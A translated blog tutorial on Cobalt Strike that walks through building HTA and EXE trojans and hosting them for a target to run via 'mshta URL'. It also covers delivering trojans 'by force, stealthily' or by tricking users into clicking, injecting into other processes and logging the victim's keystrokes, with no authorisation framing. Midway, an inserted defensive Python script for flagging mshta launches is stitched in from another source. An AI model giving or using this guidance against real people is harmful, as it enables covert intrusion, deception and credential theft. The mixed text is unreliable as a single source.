Penetration Testing Tools (1) CS

1. Penetration testing tools

I. CobaltStrike

Abbreviated as CS. Built on a distributed (client/server) structure, it supports both solo and team work and is easy to use. (It has good support for the Windows operating system; for Linux systems an additional plug-in needs to be added.)

Starting and using CS

Here CS is started on a Linux system, so download CS on Linux; version 4.5 or later is recommended, as it is more user-friendly.

1. Start the team server
Use the cd command to enter the CS folder, then enter the command:
sudo ./teamserver ip password
where ip is your computer's IP address and password is a password you choose yourself.

2. Start the client and connect
Open another command line window, enter the CS folder, and enter:

sudo ./cobaltstrike
A login window appears; enter the password you just defined to log in.

3. Generating the Trojan program:

Two forms of Trojan: HTA and EXE

HTA

1. Create a listener:

The listener receives the callback from the target machine and handles the subsequent control operations.

Cobalt Strike -> Listeners -> create a listener and give it a name

2. Create the HTA Trojan program

HTA stands for HTML Application; here it is a malicious HTML application.

When creating the HTA, select the previously created listener and save the file locally.

Attacks -> Packages -> HTML Application

3. File hosting

Host the HTA as a file and generate a URL for it.

Attacks -> Web Drive-by -> Host File

4. The URL is then entered in the other party's command line window:

mshta URL

If entering the mshta command is restricted, the restriction can be bypassed.
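From the defender's side, the mshta-URL pattern in step 4 is easy to spot in process-creation telemetry. The following Python is an added example, not code from the original post: it triages constructed, simplified Sysmon Event ID 1 style records (Image, CommandLine, ParentImage fields; hosts and paths are made-up sample data) and flags mshta launches, rating a remote http/https argument higher than a local .hta file.

```python
import re
from urllib.parse import urlparse

# Constructed, simplified Sysmon Event ID 1 (process creation) records, one per line,
# as "key=value" pairs separated by " | ". Hosts and paths are made-up sample data.
SAMPLE_LOG = """\
Image=C:\\Windows\\System32\\mshta.exe | CommandLine=mshta http://203.0.113.10/update.hta | ParentImage=C:\\Windows\\System32\\cmd.exe
Image=C:\\Windows\\System32\\mshta.exe | CommandLine=mshta.exe C:\\Users\\alice\\report.hta | ParentImage=C:\\Windows\\explorer.exe
Image=C:\\Windows\\System32\\notepad.exe | CommandLine=notepad readme.txt | ParentImage=C:\\Windows\\explorer.exe
Image=C:\\Windows\\System32\\cmd.exe | CommandLine=cmd /c "MSHTA.EXE HTTPS://203.0.113.10/x.hta" | ParentImage=C:\\Windows\\explorer.exe
"""

URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s\"']+", re.IGNORECASE)
MSHTA_RE = re.compile(r"(?<![\w.])mshta(?:\.exe)?\b", re.IGNORECASE)


def parse_record(line):
    """Split one log line into a dict of its key=value fields."""
    fields = {}
    for part in line.split(" | "):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def triage(line):
    """Return a finding for an mshta launch, or None if the line is not of interest."""
    rec = parse_record(line)
    image_name = rec.get("Image", "").rsplit("\\", 1)[-1]
    cmd = rec.get("CommandLine", "")
    # Key on both the image name and the command line, so a wrapper such as
    # 'cmd /c mshta ...' is caught even before the child mshta.exe event arrives.
    if image_name.lower() != "mshta.exe" and not MSHTA_RE.search(cmd):
        return None
    parent = rec.get("ParentImage", "").rsplit("\\", 1)[-1]
    url = URL_RE.search(cmd)
    if url:  # HTA fetched from a remote host: the hosted-URL pattern described above
        return {"severity": "high", "host": urlparse(url.group(0)).hostname,
                "parent": parent, "command": cmd}
    # A local .hta still deserves a look, but is far more often legitimate
    return {"severity": "medium", "host": None, "parent": parent, "command": cmd}


def scan(log_text):
    """Run triage over every non-empty line and collect the findings."""
    return [f for f in (triage(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f"[{finding['severity']}] parent={finding['parent']} "
              f"host={finding['host']} cmd={finding['command']}")
```

The parent image is kept in each finding because mshta spawned from a shell or an Office process is a stronger signal than the same launch from explorer.exe.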

EXE

1. Create an EXE Trojan program

Attacks -> Packages -> E, then select the listener and choose Windows EXE as the output format.

Once the target computer opens the exe file, it is under monitoring.

2. Delivery methods

By force,

stealthily,

or by hosting it on an HTTP service and inducing the user to click and download it.

3. Injecting into other applications

After the computer is under monitoring, right-click -> Explore -> port scan.

All ports in use are listed, so the Trojan can piggyback on other programs.

Click a port, then click the inject button to inject, and you obtain monitoring of that program.

You can then click Log Keystrokes (keyboard recording) and then View -> Key, and the keylogging window pops up. Whenever the keyboard of the target computer is used, the window records the keys pressed.

4. Port scanning

It can discover all IP addresses in the LAN.

Origin blog.csdn.net/love_wgll/article/details/129212782